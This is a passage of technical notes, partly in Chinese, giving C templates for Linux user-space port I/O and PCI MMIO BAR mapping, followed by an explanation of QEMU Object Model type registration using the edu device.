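The instructions only allow the accumulator as the data register: data is read into AL/AX/EAX or written from AL/AX/EAX; the port is given in DX or as an 8-bit immediate.
Port number in DX: in al, dx / in ax, dx / in eax, dx; out dx, al/ax/eax
Port number as an 8-bit immediate (zero-extended to 16 bits): in al, imm8 / out imm8, al (typically used for fixed low ports such as 0x60)
sys/io.h provides wrapper functions: inb/inw/inl/outb/outw/outl (inline-assembly wrappers around IN/OUT).
```c
#include <sys/io.h>

unsigned char  inb(unsigned short port);
unsigned char  inb_p(unsigned short port);
unsigned short inw(unsigned short port);
unsigned short inw_p(unsigned short port);
unsigned int   inl(unsigned short port);
unsigned int   inl_p(unsigned short port);

void outb(unsigned char value, unsigned short port);
void outb_p(unsigned char value, unsigned short port);
void outw(unsigned short value, unsigned short port);
void outw_p(unsigned short value, unsigned short port);
void outl(unsigned int value, unsigned short port);
void outl_p(unsigned int value, unsigned short port);

void insb(unsigned short port, void *addr, unsigned long count);
void insw(unsigned short port, void *addr, unsigned long count);
void insl(unsigned short port, void *addr, unsigned long count);
void outsb(unsigned short port, const void *addr, unsigned long count);
void outsw(unsigned short port, const void *addr, unsigned long count);
void outsl(unsigned short port, const void *addr, unsigned long count);
```
On Linux a user-space thread cannot execute I/O instructions such as inb/outb/inw/outw/inl/outl by default. The CPU checks whether the calling thread has I/O port access permission; without it, the instruction raises a general protection fault and the program is killed.
Both of the following APIs grant I/O access, and both require the CAP_SYS_RAWIO capability, which permits raw I/O operations such as ioperm/iopl.
ioperm(base, len, 1) opens the port range [base, base+len) in the current thread's I/O permission bitmap, after which in/out can be executed on those ports. It requires CAP_SYS_RAWIO or root. ioperm grants access at port-range granularity, and modern kernels support all 65536 ports.
iopl(3) raises the current thread's I/O privilege level to 3, which amounts to access to all ports. It also requires CAP_SYS_RAWIO. The official documentation marks it as deprecated and slower than ioperm, kept mainly for legacy X servers; on newer kernels (≥3.7) its inheritance behavior also differs from earlier versions.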
PIO read/write template:
```c
#define _GNU_SOURCE
#include <errno.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <unistd.h>

#define IORESOURCE_IO 0x00000100ULL

typedef struct {
    uint16_t base;        /* first port of the I/O BAR */
    uint32_t size;        /* BAR length in ports */
    uint16_t grant_base;  /* range granted through ioperm() */
    uint32_t grant_len;
    bool     have_ioperm;
    bool     have_iopl;
    bool     inited;
} pio_ctx_t;

static pio_ctx_t g_pio = {0};

/* Read the sysfs "resource" file and pick an I/O BAR.
 * bar_idx >= 0 selects that line; bar_idx < 0 picks the first I/O BAR
 * among BAR0..BAR5. */
static int parse_io_bar(const char *bdf_or_path, int bar_idx,
                        uint16_t *out_base, uint32_t *out_size)
{
    char path[256];
    if (strchr(bdf_or_path, '/')) {
        snprintf(path, sizeof(path), "%s", bdf_or_path);
    } else {
        snprintf(path, sizeof(path),
                 "/sys/bus/pci/devices/%s/resource", bdf_or_path);
    }

    FILE *fp = fopen(path, "r");
    if (!fp)
        return -1;

    int idx = 0, chosen = -1;
    char line[256];
    while (fgets(line, sizeof(line), fp)) {
        unsigned long long start = 0, end = 0, flags = 0;
        if (sscanf(line, "%llx %llx %llx", &start, &end, &flags) == 3) {
            bool is_io = (flags & IORESOURCE_IO) != 0;
            if (bar_idx >= 0 ? idx == bar_idx : (idx <= 5 && is_io)) {
                if (!is_io) {                 /* explicit index, but not an I/O BAR */
                    fclose(fp);
                    errno = EINVAL;
                    return -1;
                }
                if (end < start || start > 0xFFFFULL) {
                    fclose(fp);
                    errno = ERANGE;
                    return -1;
                }
                *out_base = (uint16_t)start;
                *out_size = (uint32_t)(end - start + 1);
                chosen = idx;
                break;
            }
        }
        idx++;
    }
    fclose(fp);

    if (chosen < 0) {
        errno = ENOENT;
        return -1;
    }
    return 0;
}

/* Try ioperm() on the BAR range first, then fall back to iopl(3). */
static int acquire_io_priv(uint16_t base, uint32_t size,
                           uint16_t *grant_base, uint32_t *grant_len,
                           bool *have_ioperm, bool *have_iopl)
{
    uint32_t len = size;
    if ((unsigned)base + len > 0x10000u)
        len = 0x10000u - base;
    if (len == 0)
        len = 1;

    if (ioperm(base, len, 1) == 0) {
        *grant_base = base;
        *grant_len = len;
        *have_ioperm = true;
        *have_iopl = false;
        return 0;
    }
    if (iopl(3) == 0) {
        *grant_base = 0;
        *grant_len = 0;
        *have_ioperm = false;
        *have_iopl = true;
        return 0;
    }
    return -1;
}

int pio_init(const char *bdf_or_path, int bar_idx)
{
    if (g_pio.inited) {
        errno = EALREADY;
        return -1;
    }

    uint16_t base = 0;
    uint32_t size = 0;
    if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0)
        return -1;

    uint16_t gbase = 0;
    uint32_t glen = 0;
    bool have_perm = false, have_iopl = false;
    if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0)
        return -1;

    g_pio.base = base;
    g_pio.size = size;
    g_pio.grant_base = gbase;
    g_pio.grant_len = glen;
    g_pio.have_ioperm = have_perm;
    g_pio.have_iopl = have_iopl;
    g_pio.inited = true;
    return 0;
}

void pio_fini(void)
{
    if (!g_pio.inited)
        return;
    if (g_pio.have_ioperm)
        (void)ioperm(g_pio.grant_base, g_pio.grant_len, 0);
    if (g_pio.have_iopl)
        (void)iopl(0);
    memset(&g_pio, 0, sizeof(g_pio));
}

uint16_t pio_base(void) { return g_pio.base; }
uint32_t pio_size(void) { return g_pio.size; }

/* Bounds-check an access of 'width' bytes at BAR offset 'off' and
 * compute the absolute port number. */
static inline int pio_port(uint32_t off, int width, uint16_t *port_out)
{
    if (!g_pio.inited) {
        errno = EPERM;
        return -1;
    }
    if ((uint64_t)off + (uint64_t)width > g_pio.size) {
        errno = ERANGE;
        return -1;
    }
    uint32_t p = (uint32_t)g_pio.base + off;
    if (p > 0xFFFFu) {
        errno = ERANGE;
        return -1;
    }
    *port_out = (uint16_t)p;
    return 0;
}

/* Reads return 0 and set errno on failure; writes are silently skipped. */
uint8_t  pio_read8(uint32_t off)  { uint16_t p; if (pio_port(off, 1, &p)) return 0; return inb(p); }
uint16_t pio_read16(uint32_t off) { uint16_t p; if (pio_port(off, 2, &p)) return 0; return inw(p); }
uint32_t pio_read32(uint32_t off) { uint16_t p; if (pio_port(off, 4, &p)) return 0; return inl(p); }

void pio_write8(uint32_t off, uint8_t v)   { uint16_t p; if (pio_port(off, 1, &p)) return; outb(v, p); }
void pio_write16(uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off, 2, &p)) return; outw(v, p); }
void pio_write32(uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off, 4, &p)) return; outl(v, p); }
```
Usage example:
```c
int main(void)
{
    /* -1: pick the first I/O BAR of the device automatically. */
    if (pio_init("0000:00:04.0", -1) != 0) {
        perror("pio_init");
        return 1;
    }
    printf("PIO base=0x%04x size=0x%x\n", pio_base(), pio_size());

    uint32_t v = pio_read32(0x64);
    printf("R32 @ +0x64 = 0x%08x\n", v);
    pio_write32(0x64, v | 1);

    pio_fini();
    return 0;
}
```
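MMIO (Memory-Mapped I/O)
MMIO means that a range of device registers or a doorbell window is mapped into the physical address space (as determined by a BAR). The CPU accesses these addresses with ordinary memory load/store instructions, which is equivalent to reading and writing device registers.
The device has BAR0..BAR5 in configuration space. The firmware or OS assigns an aligned physical address range to each Memory BAR and writes the address back into the BAR.
/proc/iomem is the global map of the physical memory address space. It contains the MMIO regions (device memory BARs) as well as System RAM, ACPI/firmware areas, ROMs, kernel code and data, host bridge downstream windows, and so on. In other words, it holds more than MMIO, but every MMIO region shows up here.
For a user-space mapping of device MMIO (a VM_IO | VM_PFNMAP VMA created through /sys/.../resourceN or through /dev/mem with remap_pfn_range), /proc/self/pagemap does not report a valid PFN; many kernel versions simply set the PFN to 0 (or clear the present bit). A pagemap-based virt_to_phys() helper applied to g_mmio.bar therefore yields 0, printed as (nil), whereas an anonymous page is ordinary RAM and resolves to a normal physical address such as 0x2e08000.
Put differently, pagemap is only suitable for memory pages (RAM), not for device I/O mappings. The physical address of an MMIO mapping should be derived from the source of the mapping rather than looked up again through pagemap.
MMIO read/write template: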
```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define IORESOURCE_MEM 0x00000200ULL

typedef struct {
    volatile uint8_t *bar;       /* mapped BAR (process virtual address) */
    size_t size;                 /* BAR size in bytes */
    size_t map_len;              /* mapping length, rounded up to a page */
    int fd;                      /* fd of the resourceN file */
    int res_idx;                 /* index of the selected BAR */
    uint64_t phys_start;         /* first physical address of the BAR */
    uint64_t phys_end;           /* last physical address (inclusive) */
    unsigned long long res_flags;
    bool inited;
} mmio_ctx_t;

static mmio_ctx_t g_mmio = {0};

/* Derive the "resource" text file and the device directory from either a
 * BDF string or a path to the device's resource/resourceN file. */
static int build_paths(const char *bdf_or_path,
                       char *resource_txt, size_t txt_sz,
                       char *dev_dir, size_t dir_sz)
{
    if (!bdf_or_path || !*bdf_or_path) {
        errno = EINVAL;
        return -1;
    }
    if (strchr(bdf_or_path, '/')) {
        snprintf(resource_txt, txt_sz, "%s", bdf_or_path);
        snprintf(dev_dir, dir_sz, "%s", bdf_or_path);
        char *slash = strrchr(dev_dir, '/');
        if (!slash) {
            errno = EINVAL;
            return -1;
        }
        *slash = '\0';
        /* A path ending in resourceN is redirected to the text file. */
        if (strstr(resource_txt, "/resource") &&
            resource_txt[strlen(resource_txt) - 1] >= '0' &&
            resource_txt[strlen(resource_txt) - 1] <= '9') {
            snprintf(resource_txt, txt_sz, "%s/resource", dev_dir);
        }
    } else {
        snprintf(resource_txt, txt_sz,
                 "/sys/bus/pci/devices/%s/resource", bdf_or_path);
        snprintf(dev_dir, dir_sz, "/sys/bus/pci/devices/%s", bdf_or_path);
    }
    return 0;
}

/* Pick a memory BAR: the line bar_idx if bar_idx >= 0, otherwise the
 * first memory BAR among BAR0..BAR5. */
static int parse_mem_bar(const char *resource_txt, int bar_idx,
                         unsigned long long *start, unsigned long long *end,
                         unsigned long long *flags, int *picked_idx)
{
    FILE *fp = fopen(resource_txt, "r");
    if (!fp)
        return -1;

    int idx = 0, sel = -1;
    char line[256];
    while (fgets(line, sizeof(line), fp)) {
        unsigned long long s = 0, e = 0, f = 0;
        if (sscanf(line, "%llx %llx %llx", &s, &e, &f) == 3) {
            bool is_mem = (f & IORESOURCE_MEM) != 0;
            if (bar_idx >= 0 ? idx == bar_idx : (idx <= 5 && is_mem)) {
                if (!is_mem || e < s) {
                    fclose(fp);
                    errno = (bar_idx >= 0) ? EINVAL : ERANGE;
                    return -1;
                }
                sel = idx;
                if (start) *start = s;
                if (end)   *end = e;
                if (flags) *flags = f;
                break;
            }
        }
        idx++;
    }
    fclose(fp);

    if (sel < 0) {
        errno = ENOENT;
        return -1;
    }
    if (picked_idx)
        *picked_idx = sel;
    return 0;
}

int mmio_init(const char *bdf_or_path, int bar_idx)
{
    if (g_mmio.inited) {
        errno = EALREADY;
        return -1;
    }

    char resource_txt[PATH_MAX];
    char dev_dir[PATH_MAX];
    if (build_paths(bdf_or_path, resource_txt, sizeof(resource_txt),
                    dev_dir, sizeof(dev_dir)) != 0)
        return -1;

    unsigned long long start = 0, end = 0, flags = 0;
    int res_idx = -1;
    if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0)
        return -1;

    size_t size = (size_t)((end - start) + 1ULL);
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    size_t map_len = (size + pg - 1) & ~(pg - 1);   /* round up to a page */

    char res_path[PATH_MAX];
    snprintf(res_path, sizeof(res_path), "%s/resource%d", dev_dir, res_idx);

    int fd = open(res_path, O_RDWR | O_SYNC);
    if (fd < 0)
        return -1;

    void *map = mmap(NULL, map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) {
        int sv = errno;
        close(fd);
        errno = sv;
        return -1;
    }

    g_mmio.bar = (volatile uint8_t *)map;
    g_mmio.size = size;
    g_mmio.map_len = map_len;
    g_mmio.fd = fd;
    g_mmio.res_idx = res_idx;
    g_mmio.phys_start = (uint64_t)start;
    g_mmio.phys_end = (uint64_t)end;
    g_mmio.res_flags = flags;
    g_mmio.inited = true;
    return 0;
}

void mmio_fini(void)
{
    if (!g_mmio.inited)
        return;
    if (g_mmio.bar)
        munmap((void *)g_mmio.bar, g_mmio.map_len);
    if (g_mmio.fd >= 0)
        close(g_mmio.fd);
    memset(&g_mmio, 0, sizeof(g_mmio));
}

volatile void *mmio_base(void)  { return g_mmio.bar; }
size_t   mmio_size(void)        { return g_mmio.size; }
int      mmio_bar_index(void)   { return g_mmio.res_idx; }
uint64_t mmio_phys_base(void)   { return g_mmio.phys_start; }
uint64_t mmio_phys_limit(void)  { return g_mmio.phys_end; }

uint64_t mmio_offset_to_phys(size_t off)
{
    if (!g_mmio.inited) { errno = EPERM; return 0; }
    if (off >= g_mmio.size) { errno = ERANGE; return 0; }
    return g_mmio.phys_start + (uint64_t)off;
}

uint64_t mmio_virt_to_phys(const void *p)
{
    if (!g_mmio.inited || !p) { errno = EPERM; return 0; }
    uintptr_t base = (uintptr_t)g_mmio.bar;
    uintptr_t addr = (uintptr_t)p;
    if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0; }
    size_t off = (size_t)(addr - base);
    return g_mmio.phys_start + (uint64_t)off;
}

/* Bounds check, written so that off + width cannot overflow. */
static inline int chk(size_t off, size_t width)
{
    if (!g_mmio.inited) { errno = EPERM; return -1; }
    if (width > g_mmio.size || off > g_mmio.size - width) { errno = ERANGE; return -1; }
    return 0;
}

uint8_t  mmio_read8(size_t off)  { if (chk(off, 1)) return 0; return *(volatile uint8_t  *)(g_mmio.bar + off); }
uint16_t mmio_read16(size_t off) { if (chk(off, 2)) return 0; return *(volatile uint16_t *)(g_mmio.bar + off); }
uint32_t mmio_read32(size_t off) { if (chk(off, 4)) return 0; return *(volatile uint32_t *)(g_mmio.bar + off); }
uint64_t mmio_read64(size_t off) { if (chk(off, 8)) return 0; return *(volatile uint64_t *)(g_mmio.bar + off); }

void mmio_write8(size_t off, uint8_t v)   { if (chk(off, 1)) return; *(volatile uint8_t  *)(g_mmio.bar + off) = v; }
void mmio_write16(size_t off, uint16_t v) { if (chk(off, 2)) return; *(volatile uint16_t *)(g_mmio.bar + off) = v; }
void mmio_write32(size_t off, uint32_t v) { if (chk(off, 4)) return; *(volatile uint32_t *)(g_mmio.bar + off) = v; }
void mmio_write64(size_t off, uint64_t v) { if (chk(off, 8)) return; *(volatile uint64_t *)(g_mmio.bar + off) = v; }

volatile void *mmio_ptr(size_t off)
{
    if (chk(off, 1)) return NULL;
    return (volatile void *)(g_mmio.bar + off);
}
```
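Data structures
```c
typedef struct {
    volatile uint8_t *bar;
    size_t size;
    size_t map_len;
    int fd;
    int res_idx;

    uint64_t phys_start;
    uint64_t phys_end;
    unsigned long long res_flags;

    bool inited;
} mmio_ctx_t;
```
Note: g_mmio is the internal global context; every API operates on this single instance.
Initialization and teardown
int mmio_init(const char *bdf_or_path, int bar_idx);
Purpose: locates the device's resource file from a BDF string or a sysfs path, selects a Memory BAR (line bar_idx, or the first Memory BAR among BAR0..BAR5 when bar_idx is negative), and mmap()s the matching resourceN file.
void mmio_fini(void);
Purpose: unmaps the BAR, closes the fd and clears g_mmio.
Note: after this call, none of the read/write or query interfaces are valid any more.
Query interfaces
```c
volatile void *mmio_base(void);
size_t   mmio_size(void);
int      mmio_bar_index(void);
uint64_t mmio_phys_base(void);
uint64_t mmio_phys_limit(void);
```
Hint: mmio_base() returns a process virtual address; mmio_phys_base() returns the device's physical address.
Address conversion
uint64_t mmio_offset_to_phys(size_t off);
Purpose: converts an offset within the mapping into the device's physical address.
Formula: phys = phys_start + off
Bounds: off < g_mmio.size; otherwise errno is set to ERANGE and 0 is returned.
uint64_t mmio_virt_to_phys(const void *p);
Purpose: converts a virtual pointer inside the mapping into the device's physical address.
Formula: phys = phys_start + ((uintptr_t)p - (uintptr_t)bar)
Bounds: p must lie in [bar, bar + size); otherwise errno is set to EINVAL and 0 is returned.
Note: these "physical addresses" are MMIO ranges (BARs) in the CPU physical address space, not DMA-side device addresses. With an IOMMU enabled, the addresses a device sees when doing DMA are device addresses, which are different.
Register access
```c
uint8_t  mmio_read8(size_t off);
uint16_t mmio_read16(size_t off);
uint32_t mmio_read32(size_t off);
uint64_t mmio_read64(size_t off);

void mmio_write8(size_t off, uint8_t v);
void mmio_write16(size_t off, uint16_t v);
void mmio_write32(size_t off, uint32_t v);
void mmio_write64(size_t off, uint64_t v);

volatile void *mmio_ptr(size_t off);
```
Arguments: off is the register offset (relative to the start of the BAR) and must satisfy off + width <= size.
Return values/behavior:
Read functions return 0 and set errno=ERANGE when out of bounds.
Write functions perform no write when out of bounds.
mmio_ptr(off) returns a direct (volatile) pointer to bar + off, or NULL when out of bounds.
Endianness: PCI/PC register layouts are usually little-endian. The functions above simply load and store in host byte order (which matches the register byte order on a little-endian host). If the target is big-endian or a register is defined with a specific byte order, handle the conversion at the call site.
Alignment: access registers at their natural width and alignment (for example use mmio_read32/write32 with off%4==0 for a 32-bit register) to avoid architecture-dependent behavior of unaligned accesses.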
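The endianness and alignment notes can be enforced with two small helpers. This is a sketch under the assumption that the register block is little-endian, as is usual for PCI devices. `le32_to_host()` reinterprets a raw 32-bit load byte by byte so that it also works on a big-endian host, and `mmio_access_ok()` checks natural alignment and bounds before an access. Both names are hypothetical and not part of the template above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Interpret the in-memory bytes of 'raw' as a little-endian value.
 * On a little-endian host this returns 'raw' unchanged. */
uint32_t le32_to_host(uint32_t raw)
{
    uint8_t b[4];
    memcpy(b, &raw, sizeof(b));              /* bytes in memory order */
    return (uint32_t)b[0] |
           ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) |
           ((uint32_t)b[3] << 24);
}

/* Nonzero if an access of 'width' bytes at offset 'off' is naturally
 * aligned and lies entirely inside a BAR of 'bar_size' bytes. */
int mmio_access_ok(size_t off, size_t width, size_t bar_size)
{
    assert(width == 1 || width == 2 || width == 4 || width == 8);
    if (off % width != 0)
        return 0;
    return width <= bar_size && off <= bar_size - width;
}
```

A caller on a big-endian host would wrap each 32-bit read as `le32_to_host(mmio_read32(off))`; on x86 the wrapper is a no-op.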
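Return values and error handling
mmio_init() returns 0 on success and -1 on failure with errno set: EALREADY if the context is already initialized, EINVAL for an invalid argument or a selected BAR that is not a Memory BAR, ENOENT if no matching BAR is found, or the errno left by fopen/open/mmap. The accessors set EPERM when the context is not initialized and ERANGE (or EINVAL for mmio_virt_to_phys) when the offset or pointer is out of range.
Usage example: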
```c
#include <stdio.h>
#include <inttypes.h>

int main(void)
{
    /* Map BAR0 of the device. */
    if (mmio_init("0000:00:04.0", 0) != 0) {
        perror("mmio_init");
        return 1;
    }

    printf("VA base = %p\n", (void *)mmio_base());
    printf("PA base = 0x%016" PRIx64 "\n", mmio_phys_base());
    printf("PA end  = 0x%016" PRIx64 " (size=%zu)\n",
           mmio_phys_limit(), mmio_size());

    /* Read-modify-write a 32-bit register at offset 0x100. */
    size_t off = 0x100;
    uint32_t v = mmio_read32(off);
    printf("READ32[0x%zx] = 0x%08x\n", off, v);
    mmio_write32(off, v | 0x1);

    /* Offset and pointer to physical address conversions. */
    printf("PA(off=0x%zx) = 0x%016" PRIx64 "\n",
           off, mmio_offset_to_phys(off));

    volatile void *p = mmio_ptr(0x200);
    printf("PA(ptr=%p) = 0x%016" PRIx64 "\n",
           (void *)p, mmio_virt_to_phys((void *)p));

    mmio_fini();
    return 0;
}
```
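QEMU Object Model
The QEMU Object Model (QOM) is an object-oriented system that QEMU builds for itself in C in order to model and manage everything in the emulation uniformly (CPUs, buses, devices, memory, machines, and so on). It provides a type system, inheritance and interfaces, an object tree, properties, and a device life cycle (realize/unrealize), so that devices can be configured, hot-plugged and migrated, and introspected through QMP/HMP.
Type: conceptually the class definition. In the source you first write a constant TypeInfo describing it; after registration it corresponds at run time to a TypeImpl (the internal representation, stored in a global hash table).
Class: the class object of a type (holding the "virtual function table" and other static behavior). Initializing the type yields an ObjectClass instance.
Object: an instance of a type, a dynamically allocated Object (or a struct derived from it, such as the Object header embedded in DeviceState).
Property: an accessor that an object or class exposes (a getter/setter, or a reference to a child object or link), used by the command line and by QMP introspection.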
```mermaid
classDiagram
    direction LR
    class TypeInfo {
        +const char* name
        +const char* parent
        +size_t instance_size
        +size_t instance_align
        +void (*instance_init)(Object*)
        +void (*instance_post_init)(Object*)
        +void (*instance_finalize)(Object*)
        +bool abstract
        +size_t class_size
        +void (*class_init)(ObjectClass*, const void*)
        +void (*class_base_init)(ObjectClass*, const void*)
        +const void* class_data
        +InterfaceInfo[] interfaces
    }
    class TypeImpl {
        +const char* name
        +size_t class_size
        +size_t instance_size
        +size_t instance_align
        +void (*class_init)(ObjectClass*, const void*)
        +void (*class_base_init)(ObjectClass*, const void*)
        +const void* class_data
        +void (*instance_init)(Object*)
        +void (*instance_post_init)(Object*)
        +void (*instance_finalize)(Object*)
        +bool abstract
        +const char* parent
        +TypeImpl* parent_type
        +ObjectClass* class %% singleton class object
        +int num_interfaces
        +InterfaceImpl interfaces[*]
    }
    class ObjectClass {
        +Type type %% points back to this class's TypeImpl
        +GSList* interfaces %% list of InterfaceClass (attached per class)
        +const char* object_cast_cache[4]
        +const char* class_cast_cache[4]
        +ObjectUnparent* unparent
        +GHashTable* properties
    }
    class Object {
        +ObjectClass* class %% points to the owning class
        +ObjectFree* free
        +GHashTable* properties
        +uint32_t ref
        +Object* parent
    }
    class InterfaceInfo {
        +const char* type %% interface type name (declared at registration)
    }
    class InterfaceImpl {
        +const char* typename %% interface name kept at run time
    }
    class InterfaceClass {
        <<interface>>
        +ObjectClass parent_class
        +Type interface_type %% points to the interface's own TypeImpl
    }
    %% relationships
    TypeInfo --> TypeImpl : type_register_static()
    TypeImpl --> TypeImpl : parent_type
    TypeImpl *-- ObjectClass : class (singleton)
    Object --> ObjectClass : class
    ObjectClass --> TypeImpl : type
    TypeInfo --> InterfaceInfo : interfaces
    TypeImpl --> InterfaceImpl : interfaces
    InterfaceClass --|> ObjectClass : subclass
    ObjectClass o-- "0..*" InterfaceClass : interfaces (per-class)
    InterfaceClass --> TypeImpl : interface_type
```
QOM整个运作包括3个部分,即类型的注册、类型的初始化以及对象的初始化。
类型的注册 TypeInfo 这一结构体用来定义一个「类」的基本属性,该结构体定义于 include/qom/object.h 当中:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 struct TypeInfo { const char *name; const char *parent; size_t instance_size; void (*instance_init)(Object *obj); void (*instance_post_init)(Object *obj); void (*instance_finalize)(Object *obj); bool abstract; size_t class_size; void (*class_init)(ObjectClass *klass, void *data); void (*class_base_init)(ObjectClass *klass, void *data); void *class_data; InterfaceInfo *interfaces; };
以 hw/misc/edu.c 文件为例,当我们在 Qemu 中要定义一个「类」的时候,我们实际上需要定义一个 TypeInfo 类型的变量。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static void pci_edu_register_types (void ) { static InterfaceInfo interfaces[] = { { INTERFACE_CONVENTIONAL_PCI_DEVICE }, { }, }; static const TypeInfo edu_info = { .name = TYPE_PCI_EDU_DEVICE, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (EduState), .instance_init = edu_instance_init, .class_init = edu_class_init, .interfaces = interfaces, }; type_register_static(&edu_info); } type_init(pci_edu_register_types)
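Every QOM type ultimately reaches the system through register_module_init: the type_init macro expands to module_init, where function is the initialization function that each type must provide and type is MODULE_INIT_QOM.
constructor is a compiler attribute. The compiler places the attributed function do_qemu_init_##function in a special section, and functions carrying this attribute run before main. In other words, every QOM type's initialization function has already been queued by register_module_init before main starts; the TypeInfo itself is registered later, when that queued function is actually called.
#define module_init(function, type)                                         \
static void __attribute__((constructor)) do_qemu_init_ ## function(void)    \
{                                                                           \
    register_module_init(function, type);                                   \
}

#define type_init(function) module_init(function, MODULE_INIT_QOM)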
register_module_init is implemented as follows:
void register_module_init(void (*fn)(void), module_init_type type)
{
    ModuleEntry *e;
    ModuleTypeList *l;

    e = g_malloc0(sizeof(*e));
    e->init = fn;
    e->type = type;

    l = find_type(type);

    QTAILQ_INSERT_TAIL(l, e, node);
}
register_module_init builds a ModuleEntry from the type's initialization function and its module type (MODULE_INIT_QOM for QOM types), then appends the entry to the list for that module type. The lists for all module types live in the init_type_list array.
Shortly after entering main, QEMU calls module_call_init with MODULE_INIT_QOM:
int main(int argc, char **argv, char **envp)
    qemu_init(argc, argv, envp);
        module_call_init(MODULE_INIT_QOM);
This function runs the init function of every ModuleEntry on the init_type_list[MODULE_INIT_QOM] list:
void module_call_init(module_init_type type)
{
    ModuleTypeList *l;
    ModuleEntry *e;

    if (modules_init_done[type]) {
        return;
    }

    l = find_type(type);

    QTAILQ_FOREACH(e, l, node) {
        e->init();
    }

    modules_init_done[type] = true;
}
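The two-phase flow described above (queue the init function from a constructor, run it later from main) can be reproduced outside QEMU. The following is a minimal sketch, assuming GCC or Clang for `__attribute__((constructor))`; it replaces QEMU's QTAILQ with a plain singly linked list, and `demo_register_types`, `types_registered`, and `pending_entries` are hypothetical names used only for illustration.

```c
#include <assert.h>
#include <stdlib.h>

typedef enum { MODULE_INIT_QOM, MODULE_INIT_MAX } module_init_type;

typedef struct ModuleEntry {
    void (*init)(void);
    struct ModuleEntry *next;
} ModuleEntry;

/* One list per module type, with a tail pointer so entries keep insertion order. */
static ModuleEntry *init_type_list[MODULE_INIT_MAX];
static ModuleEntry **init_type_tail[MODULE_INIT_MAX];
static int modules_init_done[MODULE_INIT_MAX];

static void register_module_init(void (*fn)(void), module_init_type type)
{
    ModuleEntry *e = calloc(1, sizeof(*e));
    if (!e) abort();
    e->init = fn;
    if (!init_type_tail[type]) {
        init_type_tail[type] = &init_type_list[type];
    }
    *init_type_tail[type] = e;          /* append at the tail */
    init_type_tail[type] = &e->next;
}

static void module_call_init(module_init_type type)
{
    if (modules_init_done[type]) return;   /* only the first call does work */
    for (ModuleEntry *e = init_type_list[type]; e; e = e->next) {
        e->init();
    }
    modules_init_done[type] = 1;
}

#define module_init(function, type)                                       \
static void __attribute__((constructor)) do_qemu_init_ ## function(void)  \
{                                                                         \
    register_module_init(function, type);                                 \
}
#define type_init(function) module_init(function, MODULE_INIT_QOM)

/* Hypothetical type-registration function: just counts its invocations. */
static int types_registered;
static void demo_register_types(void) { types_registered++; }
type_init(demo_register_types)

/* Number of queued entries for a module type. */
static int pending_entries(module_init_type type)
{
    int n = 0;
    for (ModuleEntry *e = init_type_list[type]; e; e = e->next) n++;
    return n;
}
```

When main starts, `pending_entries(MODULE_INIT_QOM)` is already 1 while `types_registered` is still 0; the counter only becomes 1 after `module_call_init(MODULE_INIT_QOM)`, and a second call leaves it unchanged.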
For the edu device, the init function is pci_edu_register_types. Its only job is to build a TypeInfo named edu_info and pass it to type_register_static. type_register_static calls type_register, which ends up in type_register_internal, where the real work happens.
type_register_internal is short: type_new builds a TypeImpl from the TypeInfo, and type_table_add inserts that TypeImpl into a hash table. The key is the type's name and the value is a pointer to the TypeImpl.
static TypeImpl *type_new(const TypeInfo *info)
{
    TypeImpl *ti = g_malloc0(sizeof(*ti));
    int i;

    g_assert(info->name != NULL);

    if (type_table_lookup(info->name) != NULL) {
        fprintf(stderr, "Registering `%s' which already exists\n", info->name);
        abort();
    }

    ti->name = g_strdup(info->name);
    ti->parent = g_strdup(info->parent);

    ti->class_size = info->class_size;
    ti->instance_size = info->instance_size;

    ti->class_init = info->class_init;
    ti->class_base_init = info->class_base_init;
    ti->class_data = info->class_data;

    ti->instance_init = info->instance_init;
    ti->instance_post_init = info->instance_post_init;
    ti->instance_finalize = info->instance_finalize;

    ti->abstract = info->abstract;

    for (i = 0; info->interfaces && info->interfaces[i].type; i++) {
        ti->interfaces[i].typename = g_strdup(info->interfaces[i].type);
    }
    ti->num_interfaces = i;

    return ti;
}

static GHashTable *type_table_get(void)
{
    static GHashTable *type_table;

    if (type_table == NULL) {
        type_table = g_hash_table_new(g_str_hash, g_str_equal);
    }

    return type_table;
}

static void type_table_add(TypeImpl *ti)
{
    assert(!enumerating_types);
    g_hash_table_insert(type_table_get(), (void *)ti->name, ti);
}

static TypeImpl *type_register_internal(const TypeInfo *info)
{
    TypeImpl *ti;
    ti = type_new(info);

    type_table_add(ti);
    return ti;
}
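To make the TypeInfo to TypeImpl step concrete, here is a small standalone sketch of a name-keyed type table. It is not QEMU code: a linked list stands in for the GHashTable, the structs are trimmed to three fields, `dup_string` is a hypothetical helper, and a duplicate name returns NULL where QEMU would abort.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Trimmed-down TypeInfo/TypeImpl: only the fields this sketch needs. */
typedef struct TypeInfo {
    const char *name;
    const char *parent;
    size_t instance_size;
} TypeInfo;

typedef struct TypeImpl {
    char *name;
    char *parent;
    size_t instance_size;
    struct TypeImpl *next;      /* chain link; QEMU uses a GHashTable instead */
} TypeImpl;

static TypeImpl *type_table;    /* head of the name -> TypeImpl table */

/* Copy a string, passing NULL through unchanged. */
static char *dup_string(const char *s)
{
    if (!s) return NULL;
    size_t n = strlen(s) + 1;
    char *copy = malloc(n);
    if (!copy) abort();
    memcpy(copy, s, n);
    return copy;
}

static TypeImpl *type_table_lookup(const char *name)
{
    for (TypeImpl *ti = type_table; ti; ti = ti->next) {
        if (strcmp(ti->name, name) == 0) return ti;
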